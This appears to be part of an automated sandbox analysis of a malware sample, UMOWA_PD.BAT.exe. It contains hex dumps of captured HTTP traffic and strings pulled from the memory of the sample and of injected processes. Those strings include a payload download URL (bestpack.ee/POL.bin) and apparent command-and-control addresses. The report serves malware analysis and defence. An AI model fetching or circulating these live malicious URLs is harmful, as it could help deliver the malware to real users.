94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 08:00:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 08:00:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 08:00:21 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 08:00:23 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 08:00:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 08:00:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299601778.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15404467562.0000000032F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bestpack.ee/POL.bin
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bestpack.ee/POL.binT
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bestpack.ee/POL.binV~
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15298807290.0000000003A9E000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299059569.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15196048449.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15195457057.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15298807290.0000000003A9E000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299059569.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15196048449.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15195457057.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
        Source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: UMOWA_PD.BAT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004EDC000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.00000000041BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Inastra.online
        Source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: giLTwJlyLWpfb.exe, 00000005.00000002.19981281087.0000000000B2E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.greekhause.org
        Source: giLTwJlyLWpfb.exe, 00000005.00000002.19981281087.0000000000B2E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.greekhause.org/phvf/
        Source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
